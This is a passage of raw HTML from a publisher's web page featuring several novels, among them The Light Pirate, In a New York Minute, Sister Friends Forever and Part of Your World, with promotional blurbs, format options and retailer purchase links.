	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/farah-heron/kamila-knows-best/9781538734995/">
						ebook					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/farah-heron/kamila-knows-best/9781549166587/">
						Audiobook Download <span class="title-header__dropdown-format">Unabridged</span>					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1948828217  desc-arrow-2581097973">
	<title id="titlet-arrow-1948828217">Arrow Icon</title>
	<desc id="desc-arrow-2581097973">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/1538735008?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781538735008"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781538735008"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9781538735008"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781538735008"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781538735008/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781538735008"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781538735008"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781538735008"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9781538708279">
	<div class="featured-title__cover">
		<a href="https://www.grandcentralpublishing.com/titles/lily-brooks-dalton/the-light-pirate/9781538708279/" alt="The Light Pirate">
			<img width="190" height="285" src="" class="lazyload orientation-portrait" alt="The Light Pirate" loading="lazy" data-src="https://www.grandcentralpublishing.com/wp-content/uploads/2022/10/9781538708279.jpg?fit=190%2C285" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.grandcentralpublishing.com/titles/lily-brooks-dalton/the-light-pirate/9781538708279/" alt="The Light Pirate">
							The Light Pirate						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.grandcentralpublishing.com/contributor/lily-brooks-dalton/" class="title-header__author"><span>Lily Brooks-Dalton</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><B>For readers of<I> Station Eleven</I> and <I>Where the Crawdads Sing<B>&#160;</B></I>comes&#160;a hopeful, sweeping story of survival and resilience spanning one extraordinary woman&rsquo;s lifetime as she navigates the uncertainty, brutality, and arresting beauty of a rapidly changing world.</B><BR /><BR />Florida is slipping away. As devastating weather patterns and rising sea levels wreak gradual havoc on the state&rsquo;s infrastructure, a powerful hurricane approaches a small town on the southeastern coast. Kirby Lowe, an electrical line worker, his pregnant wife, Frida, and their two sons, Flip and Lucas, prepare for the worst. When the boys go missing just before the hurricane hits, Kirby heads out into the high winds in search of his children. Left alone, Frida goes into premature labor and gives birth to an unusual child, Wanda, whom she names after the catastrophic storm that ushers her into a society closer to collapse than ever before.<BR /><BR />As Florida continues to unravel, Wanda grows. Moving from childhood to adulthood, adapting not only to the changing landscape, but also to the people who stayed behind in a place abandoned by civilization, Wanda loses family, gains community, and ultimately, seeks adventure, love, and purpose in a place remade by nature.<BR /><BR />Told in four parts&mdash;power, water, light, and time&mdash;<I>The Light Pirate</I> mirrors the rhythms of the elements and the sometimes quick, sometimes slow dissolution of the world as we know it. It is a meditation on the changes we would rather not see, the future we would rather not greet, and a call back to the beauty and violence of an untamable wilderness.<BR />&#160;</p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Hardcover</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3414104520  desc-arrow-2753165477">
	<title id="titlet-arrow-3414104520">Arrow Icon</title>
	<desc id="desc-arrow-2753165477">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/lily-brooks-dalton/the-light-pirate/9781538708293/">
						ebook					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/lily-brooks-dalton/the-light-pirate/9781668611401/">
						Audiobook Download <span class="title-header__dropdown-format">Unabridged</span>					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1021047911  desc-arrow-3242508186">
	<title id="titlet-arrow-1021047911">Arrow Icon</title>
	<desc id="desc-arrow-3242508186">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/1538708272?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781538708279"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781538708279"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9781538708279"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781538708279"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781538708279/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781538708279"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781538708279"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781538708279"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9781538737620">
	<div class="featured-title__cover">
		<a href="https://www.grandcentralpublishing.com/titles/kate-spencer/in-a-new-york-minute/9781538737620/" alt="In a New York Minute">
			<img width="190" height="285" src="" class="lazyload orientation-portrait" alt="In a New York Minute" loading="lazy" data-src="https://www.grandcentralpublishing.com/wp-content/uploads/2022/01/9781538737620-1.jpg?fit=190%2C285" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.grandcentralpublishing.com/titles/kate-spencer/in-a-new-york-minute/9781538737620/" alt="In a New York Minute">
							In a New York Minute						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.grandcentralpublishing.com/contributor/kate-spencer/" class="title-header__author"><span>Kate Spencer</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><B>A clever, tender, and romantic &quot;Nora Ephron romp for the modern ages&quot; (Christina Lauren) for readers of Jasmine Guillory, Abby Jimenez, and Sophie Cousens, this laugh-out-loud debut is a perceptive reminder that fate can have a sense of humor, and that love can happen . . .&#160;<I>In a New York Minute</I>.</B><BR /><BR />Franny Doyle is having the <I>worst</I> day. She&rsquo;s been laid off from her (admittedly mediocre) job, the subway doors ripped her favorite silk dress to ruins, and now she&rsquo;s flashed her unmentionables to half of lower Manhattan. On the plus side, a dashing stranger came to her rescue with his (<I>Gucci!</I>) suit jacket. On the not-so-plus side, he can&rsquo;t get away from her fast enough.<BR /><BR />Worse yet? Someone posted their (entirely not) meet-cute online. Suddenly Franny and her knight-in-couture, Hayes Montgomery III, are the newest social media sensation, and all of New York is shipping #SubwayQTs.<BR /><BR />Only Franny and Hayes couldn&rsquo;t be a more disastrous match. She&rsquo;s fanciful, talkative, and creative. He&rsquo;s serious, shy, and all about numbers. Luckily, in a city of eight million people, they never have to meet again. Yet somehow, Hayes and Franny keep running into each other&mdash;and much to their surprise, they enjoy each other&rsquo;s company. <I>A lot</I>. But when Franny&rsquo;s whole world is turned upside down (again!), can she find the courage to trust in herself and finally have the life&mdash;and love&mdash;she&rsquo;s always wanted?<BR /><BR />&ldquo;Spins a catastrophic meet-cute into <B>a richly realized romance</B> that&#039;s surrounded by even more love stories&mdash;between friends, between families, and between New Yorkers and their city. You&#039;ll devour it.&rdquo;<BR />&mdash;Heather Cocks and Jessica Morgan, <I>USA Today </I>bestselling authors of <I>The Royal We</I> and <I>The Heir Affair</I><BR />&#160;<BR />&ldquo;A love story to friendship, discovering what&mdash;and who&mdash;makes you feel truly yourself, and New York City. <B>I flew through this book and enjoyed every moment!</B>&rdquo;<BR />&mdash;Jasmine Guillory, <I>New York Times </I>bestselling author of <I>While We Were Dating</I><BR />&#160;<BR />&ldquo;A sparkling delight about found and chosen family, being brave even in the tiny moments, and the rewards we can reap when we put our authentic selves out there. What <B>a sweet, hilarious treat</B>.&rdquo;<BR />&mdash;Christina Lauren, <I>New York Times</I> bestselling author<BR />&#160;<BR />&ldquo;A <B>frolicky, playful</B> rom-com about finding Mr. Right when everything else goes wrong.&rdquo;<BR />&mdash;Abby Jimenez, <I>New York Times </I>bestselling author of <I>Life&rsquo;s Too Short</I><BR />&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;<BR />&ldquo;A perfect New York romance, as <B>sweet, steamy, and surprising</B> as the city itself.&rdquo;<BR />&mdash;Abbi Waxman, <I>USA Today </I>bestselling author of <I>The Bookish Life of Nina Hill</I><BR />&#160;<BR />&ldquo;If you&rsquo;re looking for the perfect &lsquo;meet cute,&rsquo; look no further<B>.&#160; Adorable banter and countless laugh-out-loud moments</B> makes this charming romance a true delight.&rdquo;<BR />&mdash;Farrah Rochon,&#160;<I>USA Today</I>&#160;bestselling author of <I>The Dating Playbook</I></p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Hardcover</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-24853783  desc-arrow-774225665">
	<title id="titlet-arrow-24853783">Arrow Icon</title>
	<desc id="desc-arrow-774225665">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/kate-spencer/in-a-new-york-minute/9781538737613/">
						ebook					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/kate-spencer/in-a-new-york-minute/9781549166549/">
						Audiobook Download <span class="title-header__dropdown-format">Unabridged</span>					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/kate-spencer/in-a-new-york-minute/9781538737644/">
						Trade Paperback					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3024258624  desc-arrow-2977161981">
	<title id="titlet-arrow-3024258624">Arrow Icon</title>
	<desc id="desc-arrow-2977161981">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/1538737620?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781538737620"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781538737620"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9781538737620"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781538737620"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781538737620/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781538737620"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781538737620"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781538737620"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9781538708958">
	<div class="featured-title__cover">
		<a href="https://www.grandcentralpublishing.com/titles/kimberla-lawson-roby/sister-friends-forever/9781538708958/" alt="Sister Friends Forever">
			<img width="190" height="285" src="" class="lazyload orientation-portrait" alt="Sister Friends Forever" loading="lazy" data-src="https://www.grandcentralpublishing.com/wp-content/uploads/2022/04/9781538708958-1.jpg?fit=190%2C285" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.grandcentralpublishing.com/titles/kimberla-lawson-roby/sister-friends-forever/9781538708958/" alt="Sister Friends Forever">
							Sister Friends Forever						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.grandcentralpublishing.com/contributor/kimberla-lawson-roby/" class="title-header__author"><span>Kimberla Lawson Roby</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><B>This emotional novel from a&#160;<I>New York Times</I>&#160;bestselling author follows four lifelong friends as each faces a crisis in family, love, and forgiveness.&#160;</B><BR /><BR /> Serena, Michelle, Kenya, and Lynette have been best friends since they were small children. And as sister friends forever, they have always been there for one another, through good times and bad, no matter what.<BR /><BR /> This year is a crucial turning point for each woman. Serena, still single, is questioning why love hasn&rsquo;t found her yet. Michelle is engaged and ready to walk down the aisle&mdash;until an old flame strolls back into her life. Kenya is happily married, but at the same time, her husband&rsquo;s ex-wife won&rsquo;t allow them or their family to live in peace. And Lynette&rsquo;s divorce from her cheating husband has her nervously dating for the first time in well over a decade.<BR /><BR /> During this difficult period, their friendship will be tested like never before. Yet it is that sisterly love that they will need . . . more than ever.</p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Hardcover</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2310214306  desc-arrow-2060698706">
	<title id="titlet-arrow-2310214306">Arrow Icon</title>
	<desc id="desc-arrow-2060698706">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/kimberla-lawson-roby/sister-friends-forever/9781538708972/">
						ebook					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/kimberla-lawson-roby/sister-friends-forever/9781668605707/">
						Audiobook Download <span class="title-header__dropdown-format">Unabridged</span>					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-280057  desc-arrow-2300166710">
	<title id="titlet-arrow-280057">Arrow Icon</title>
	<desc id="desc-arrow-2300166710">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/1538708957?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781538708958"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781538708958"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9781538708958"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781538708958"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781538708958/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781538708958"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781538708958"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781538708958"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9781538704370">
	<div class="featured-title__cover">
		<a href="https://www.grandcentralpublishing.com/titles/abby-jimenez/part-of-your-world/9781538704370/" alt="Part of Your World">
			<img width="190" height="285" src="" class="lazyload orientation-portrait" alt="Part of Your World" loading="lazy" data-src="https://www.grandcentralpublishing.com/wp-content/uploads/2022/04/9781538704370.jpg?fit=190%2C285" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.grandcentralpublishing.com/titles/abby-jimenez/part-of-your-world/9781538704370/" alt="Part of Your World">
							Part of Your World						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.grandcentralpublishing.com/contributor/abby-jimenez/" class="title-header__author"><span>Abby Jimenez</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><B>A refreshingly modern fairy tale and instant&#160;<I>New York Times </I>bestseller that&#160;<I>Love Hypothesis</I> author Ali Hazelwood hai</B><B>ls as &quot;an uplifting, feel-good, romantic read.&quot;&#160;</B><BR /><BR />After a wild bet, gourmet grilled-cheese sandwich, and cuddle with a baby goat, Alexis Montgomery has had her world turned upside down. The cause: Daniel Grant, a ridiculously hot carpenter who&rsquo;s ten years younger than her and as casual as they come&mdash;the complete opposite of sophisticated city-girl Alexis. And yet their chemistry is undeniable.<BR /><BR />While her ultra-wealthy parents want her to carry on the family legacy of world-renowned surgeons, Alexis doesn&rsquo;t need glory or fame. She&rsquo;s fine with being a &ldquo;mere&rdquo; ER doctor. And every minute she spends with Daniel and the tight-knit town where he lives, she&rsquo;s discovering just what&rsquo;s really important. Yet letting their relationship become anything more than a short-term fling would mean turning her back on her family and giving up the opportunity to help thousands of people.<BR /><BR />Bringing Daniel into her world is impossible, and yet she can&rsquo;t just give up the joy she&rsquo;s found with him either. With so many differences between them, how can Alexis possibly choose between her world and his?<BR /><BR /><B>&quot;Abby Jimenez&rsquo;s words are like fairy dust... they sprinkled humor and warmth all over my life. Pick up&#160;<I>Part of Your World</I>&#160;if you&rsquo;re looking for an uplifting, feel-good, romantic read&mdash;and for a beautiful reminder that we should always try to live the life that makes us the happiest.&quot; --Ali Hazelwood, New York Times bestselling author of&#160;<I>The Love Hypothesis</I></B><BR />&#160;</p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Trade Paperback</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3487410324  desc-arrow-2438562983">
	<title id="titlet-arrow-3487410324">Arrow Icon</title>
	<desc id="desc-arrow-2438562983">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/abby-jimenez/part-of-your-world/9781538704363/">
						ebook					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/abby-jimenez/part-of-your-world/9781538708729/">
						Hardcover					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/abby-jimenez/part-of-your-world/9781549135125/">
						Audiobook Download <span class="title-header__dropdown-format">Unabridged</span>					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3277229073  desc-arrow-175252279">
	<title id="titlet-arrow-3277229073">Arrow Icon</title>
	<desc id="desc-arrow-175252279">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/1538704374?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781538704370"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781538704370"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
